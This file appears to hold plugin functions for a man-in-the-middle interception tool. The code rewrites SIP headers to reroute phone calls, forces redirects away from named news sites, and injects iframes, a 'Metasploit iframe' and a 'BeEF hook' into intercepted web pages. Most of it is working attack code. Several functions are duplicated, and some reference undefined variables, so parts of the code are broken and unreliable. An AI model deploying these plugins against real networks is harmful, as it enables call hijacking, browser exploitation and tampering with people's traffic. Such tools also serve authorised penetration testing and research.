def doRequest(session, request_header, data, e):
changed = 0
stop = 0
i = 1
# Lets change all outgoing calls to a specific number/sipuri
# to use different caller ID, say, +14433267298
# We're only looking to target a specific outgoing number.
target = "12068837526@"
reroute_to = "14433267298@"
targetlen = len(target)
# We need to modify the SIP URI in the initial INVITE request, but also in every other request
# so that both caller and proxy/server maintain state.
if e.is_request:
(method,sipuri,version) = header.headerget(request_header,"Request").split(" ",2)
if sipuri.find(target):
# Switch the phone number in the outgoing SIP URI.
new_request_line = "%s %s %s" % (method,sipuri.replace(target,reroute_to),version)
header.headerfix(request_header,"Request",new_request_line)
changed = 1
stop = 1
# Now we need to change the To header on both sides of the connection.
# If this is a request, we change the To from the target to the reroute_to.
# But if this is a response, we change the To from the reroute_to back to the target
to_rvalue = header.headerget(request_header,"To")
if to_rvalue != "HeaderNotFound":
new_to_rvalue = to_rvalue.replace(target,reroute_to)
ml.api.header.headerfix(request_header,"To",new_to_rvalue)
# In a response, we need to switch both the To header back to the real destination
# and we need to switch the Contact header in the same way.
if e.is_response:
to_rvalue = header.headerget(request_header,"To")
if to_rvalue.find(reroute_to):
new_to_rvalue = to_rvalue.replace(reroute_to,target)
ml.api.header.headerfix(request_header,"To",new_to_rvalue)
# Now change the contact info.
contact_rvalue = header.headerget(request_header,"Contact")
if contact_rvalue.find(reroute_to):
new_contact_rvalue = contact_rvalue.replace(reroute_to,target)
ml.api.header.headerfix(request_header,"Contact",new_contact_rvalue)
changed = 1
stop = 1
return(request_header, data, changed, stop)
def doRequest(session, request_header, response_header, data):
changed = 0
stop = 0
i = 1
# Lets change all outgoing calls to a specific number/sipuri
# to use different caller ID, say, +14433267298
# We're only looking to target a specific outgoing number.
target = "12068837526@"
reroute_to = "14433267298@"
targetlen = len(target)
# We need to modify the SIP URI in the initial INVITE request, but also in every other request
# so that both caller and proxy/server maintain state.
if self.is_request:
(method, sipuri, version) = header.headerget(request_header,
"Request").split(" ", 2)
if sipuri.find(target):
# Switch the phone number in the outgoing SIP URI.
new_request_line = "%s %s %s" % (
method, sipuri.replace(target, reroute_to), version)
header.headerfix(request_header, "Request", new_request_line)
changed = 1
stop = 1
# Now we need to change the To header on both sides of the connection.
# If this is a request, we change the To from the target to the reroute_to.
# But if this is a response, we change the To from the reroute_to back to the target
to_rvalue = header.headerget(request_header, "To")
if to_rvalue != "HeaderNotFound":
new_to_rvalue = to_rvalue.replace(target, reroute_to)
ml.api.header.headerfix(request_header, "To", new_to_rvalue)
# In a response, we need to switch both the To header back to the real destination
# and we need to switch the Contact header in the same way.
if self.is_response:
to_rvalue = header.headerget(request_header, "To")
if to_rvalue.find(reroute_to):
new_to_rvalue = to_rvalue.replace(reroute_to, target)
ml.api.header.headerfix(request_header, "To", new_to_rvalue)
# Now change the contact info.
contact_rvalue = header.headerget(request_header, "Contact")
if contact_rvalue.find(reroute_to):
new_contact_rvalue = contact_rvalue.replace(reroute_to, target)
ml.api.header.headerfix(request_header, "Contact",
new_contact_rvalue)
changed = 1
stop = 1
return (request_header, data, changed, stop)
def doResponse(session, request_header, response_header, data):
changed = 0
stop = 0
i = 1
# Check to see if we've got the right target site
target = "www.foxnews.com"
request_match = (("Host",target),)
redirect_url = "http://www.cnn.com"
if header.headertest(request_header,request_match):
# We could make sure only to do this if the browser was getting a web page.
response_match = (("Content-type","TEXT/HTML"),)
if header.headertest( response_header,response_match ):
# Check the response code line.
response_code_line = response_header[0][1]
(protover,response_code,reason) = response_code_line.split(" ")
print ("Response code line had these elements --%s-- --%s-- --%s\n" % (protover,response_code,reason) )
# Make sure we are only doing this on a 200 message.
if response_code != "200":
ml.jjlog.debug("Response code was %s, not 200, so we won't inject here\n" % response_code)
return(response_header, data, changed, stop)
# Change the response code to a 30x redirect.
# Choose one of these two.
response_code = 307
reason = "Temporary Redirect\n"
#response_code = 301
#reason = "Moved Permanently"
header.headerfix(response_header,"Response",("%s %s %s" % (protover,response_code,reason)) )
# Check if there is a Location header already?
# TODO: make a routine that inserts a new header after a specific line.
if header.headerget(response_header,"Location") and redirect_url:
header.headerfix( response_header, "Location", redirect_url + "\n")
ml.jjlog.debug("Replaced the location: %s\n" % redirect_url)
else:
response_header.append( ("Location",redirect_url + "\n") )
ml.jjlog.debug("Appended our own location: %s\n" % redirect_url)
# We have changed the header and we don't want any other plugins to touch it.
# TODO: Decide on how to do priority/dependencies/ordering so redirects go first.
changed = 1
stop = 1
return(response_header, data, changed, stop)
def doResponse(session, request_header, response_header, data):
changed = 0
stop = 0
i = 1
# Check to see if we've got the right target site
target = "slashdot.org"
request_match = (("Host",target),)
# Set up the IFRAME to inject into the HTML
# TODO: Set the traffic capture code that gets my IP address to log it into
# some kind of global or class variable.
inserted_url = "http://www.inguardians.com/tools/logo-themiddler-150px.jpg"
iframe = '''<iframe height=103 width=150 src="%s"></iframe>''' % (inserted_url)
if header.headertest(request_header,request_match):
# We could make sure only to do this if the browser was getting a web page.
response_match = (("Content-type","TEXT/HTML"),)
if header.headertest( response_header,response_match ):
# Check the response code line.
response_code_line = response_header[0][1]
(protover,response_code,reason) = response_code_line.split(" ",2)
ml.jjlog.debug("Response code line had these elements --%s-- --%s-- --%s\n" % (protover,response_code,reason) )
# Make sure we are only doing this on a 200 message.
# There's no point to injecting into a 30x redirect!
if response_code != "200":
return(response_header, data, changed, stop)
ml.jjlog.debug("Preparing to inject iframe into request for %s" % target)
### MANIPULATE DATA - INSERT SCRIPT
data = re.sub(r'\<body\>', r'<body>' + iframe, data)
changed = 1
### Correct the content-length.
header.headerfix(response_header, "Content-Length", str(len(data)))
# We have changed the header and we don't want any other plugins to touch it.
# TODO: Decide on how to do priority/dependencies/ordering so redirects go first.
changed = 1
stop = 1
return(response_header, data, changed, stop)
def doResponse(session, request_header, response_header, data):
changed = 0
stop = 0
### DETERMINE IF WE NEED TO CHANGE DATA
if header.headertest(request_header, request_match) & header.headertest(response_header, response_match):
### MANIPULATE DATA
data = redirect_code
print("User has been redirected to " + redirect_url)
### RETURN DATA
if changed:
header.headerfix(response_header, "Content-Length", str(len(data)))
return(response_header, data, changed, stop)
def doResponse(session, request_header, response_header, data):
changed = 0
stop = 0
### DETERMINE IF WE NEED TO CHANGE DATA
if header.headertest(request_header, request_match) & header.headertest(response_header, response_match):
### MANIPULATE DATA - INSERT SCRIPT
data = re.sub('</body>', code1 + '</body>', data)
changed = 1
print("Metasploit iframe injected")
### RETURN DATA
if changed:
header.headerfix(response_header, "Content-Length", str(len(data)))
return(response_header, data, changed, stop)
def doResponse(session, request_header, response_header, data):
changed = 0
stop = 0
### DETERMINE IF WE NEED TO CHANGE DATA
if header.headertest(request_header, request_match) & header.headertest(response_header, response_match):
### MANIPULATE DATA - INSERT SCRIPT
data = re.sub('</body>', code1 + '</body>', data)
changed = 1
print("BeEF hook injected")
### RETURN DATA
if changed:
header.headerfix(response_header, "Content-Length", str(len(data)))
return(response_header, data, changed, stop)
def doRequest(session, request_header, data):
changed = 0
stop = 0
# Bug - this routine is only changing the Host header, but isn't
# changing the socket's destination. Further, the host
# header shouldn't contain a full URL, just a hostname.
# Remember, the Host header was an HTTP/1.1 addition
# intended to tell the remote server which virtual
# host the browser was requesting.
#
if 0 and header.headertest(request_header, request_match):
### MANIPULATE DATA
changed = 1
stop = 1
header.headerfix(request_header, "Host", redirect_url + '\r\n')
print("User request URL has been rewritten to " + redirect_url)
### RETURN DATA
return (request_header, data, changed, stop)
